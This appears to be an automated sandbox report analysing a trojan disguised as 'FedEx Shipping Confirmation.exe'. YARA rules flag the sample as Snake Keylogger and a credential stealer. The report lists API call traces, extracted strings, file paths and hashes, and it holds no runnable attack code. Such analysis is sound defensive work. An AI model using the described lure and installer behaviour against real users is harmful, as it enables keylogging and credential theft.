Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	28.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.2%
Total number of Nodes:	710
Total number of Limit Nodes:	22

Executed Functions

Function 0040352F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403552
GetVersionExW.KERNEL32(?), ref: 0040357D
GetVersionExW.KERNEL32(?), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403629
#17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403666
OleInitialize.OLE32(00000000), ref: 0040366D
SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004036A1
CharNextW.USER32(00000000,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe",00000020,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DA
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 00403812
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403823
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040382F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403843
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040384B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040385C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403864
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403878
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe",00000000,0000000A), ref: 00403951

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561

wsprintfW.USER32 ref: 004039AE
GetFileAttributesW.KERNEL32(948,C:\Users\user\AppData\Local\Temp\,948,?), ref: 004039E1
DeleteFileW.KERNEL32(948), ref: 004039ED
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,948,?), ref: 00403A1B

Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E

CopyFileW.KERNEL32(C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,948,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31

Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D

Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76173420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8

OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403A7F
ExitProcess.KERNEL32 ref: 00403A9C
CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,948,00000000), ref: 00403AA3
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403ABF
OpenProcessToken.ADVAPI32(00000000), ref: 00403AC6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AFE
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
ExitProcess.KERNEL32 ref: 00403B46

Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08

Strings

UXTHEME, xrefs: 0040361D, 00403622, 00403628
C:\Users\user\Desktop\FedEx Shipping Confirmation.exe, xrefs: 00403A2C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403807, 0040380C, 00403822, 0040382E, 0040383D, 0040384A, 00403856, 0040385E, 0040394C, 004039CD, 004039F9, 00403A1A, 00403A23
\Temp, xrefs: 00403829
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 004037F7, 00403919, 00403966, 00403974
TEMP, xrefs: 00403857
"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe", xrefs: 004036A7, 004036AD, 004036C2, 004038A0
~nsu%X.tmp, xrefs: 004039A5
948, xrefs: 00403991, 004039C2, 004039E0, 004039EC, 00403A2B, 00403A3D, 00403A6A
Low, xrefs: 00403845
NSIS Error, xrefs: 00403692
SeShutdownPrivilege, xrefs: 00403AD5
C:\Users\user\Desktop, xrefs: 0040396F
1033, xrefs: 00403873
Error launching installer, xrefs: 004038FA
TMP, xrefs: 0040385F
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 00403924

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"$1033$948$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\Desktop$C:\Users\user\Desktop\FedEx Shipping Confirmation.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-1158538018
Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

Function 6ED21BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6ED212BB: GlobalAlloc.KERNEL32(00000040,?,6ED212DB,?,6ED2137F,00000019,6ED211CA,-000000A0), ref: 6ED212C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6ED21D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6ED21D75
lstrcpyW.KERNEL32(00000808,?), ref: 6ED21D7F
GlobalFree.KERNEL32(00000000), ref: 6ED21D92
GlobalFree.KERNEL32(?), ref: 6ED21E74
GlobalFree.KERNEL32(?), ref: 6ED21E79
GlobalFree.KERNEL32(?), ref: 6ED21E7E
GlobalFree.KERNEL32(00000000), ref: 6ED22068
lstrcpyW.KERNEL32(?,?), ref: 6ED22222
GetModuleHandleW.KERNEL32(00000008), ref: 6ED222A1
LoadLibraryW.KERNEL32(00000008), ref: 6ED222B2
GetProcAddress.KERNEL32(?,?), ref: 6ED2230C
lstrlenW.KERNEL32(00000808), ref: 6ED22326

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: f4e383f93dbf8578c3223e257788911ae93aec9da8e26dfaa46db4603a3dea14
Instruction ID: 4630fd7340582e1d4bd620fb92a28e2002aaba4060a70d1c178c94b4ce183016
Opcode Fuzzy Hash: f4e383f93dbf8578c3223e257788911ae93aec9da8e26dfaa46db4603a3dea14
Instruction Fuzzy Hash: 0E228B71D24206DEDB508FE989806EEB7B4FB0531DF10853AE3A5A7280D7769A89CB50

Function 00405C60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405C89
lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405CD1
lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405CF4
lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405CFA
FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405D0A
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405DAA
FindClose.KERNEL32(00000000), ref: 00405DB9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6D
\*.*, xrefs: 00405CCB
P7z, xrefs: 00405CB9
"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe", xrefs: 00405C69

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
API String ID: 2035342205-3800352878
Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE

Function 00406044 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,80000000,00000003), ref: 00406048
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 004068B1 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76173420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
FindClose.KERNEL32(00000000), ref: 004068C8

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
ShowWindow.USER32(?), ref: 00404030
GetWindowLongW.USER32(?,000000F0), ref: 00404042
ShowWindow.USER32(?,00000004), ref: 0040405B
DestroyWindow.USER32 ref: 0040406F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
GetDlgItem.USER32(?,?), ref: 004040A7
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
IsWindowEnabled.USER32(00000000), ref: 004040C2
GetDlgItem.USER32(?,?), ref: 0040416D
GetDlgItem.USER32(?,00000002), ref: 00404177
SetClassLongW.USER32(?,000000F2,?), ref: 00404191
SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041E2
GetDlgItem.USER32(?,00000003), ref: 00404288
ShowWindow.USER32(00000000,?), ref: 004042A9
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
EnableWindow.USER32(?,?), ref: 004042D6
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042EC
EnableMenuItem.USER32(00000000), ref: 004042F3
SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040430B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
SetWindowTextW.USER32(?,007A1748), ref: 0040435C
ShowWindow.USER32(?,0000000A), ref: 00404490

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

Function 00403C26 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975

lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76173420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00403CA7
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76173420), ref: 00403D27
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
GetFileAttributesW.KERNEL32(Call), ref: 00403D45
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

RegisterClassW.USER32(007A7200), ref: 00403DCB
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
ShowWindow.USER32(00000005,00000000), ref: 00403E4E
GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
RegisterClassW.USER32(007A7200), ref: 00403E90
DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF

Strings

.exe, xrefs: 00403D34
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2B
RichEd32, xrefs: 00403E62
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5A
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 00403CB6, 00403CBE, 00403D61, 00403D67, 00403D77
_Nb, xrefs: 00403DAA, 00403E12
"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe", xrefs: 00403C29
Call, xrefs: 00403CEE, 00403CF7, 00403D05, 00403D54, 00403D5A
RichEdit, xrefs: 00403E81
.DEFAULT\Control Panel\International, xrefs: 00403C92
RichEdit20W, xrefs: 00403E72, 00403E78
1033, xrefs: 00403C46, 00403CA2
RichEd20, xrefs: 00403E54

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

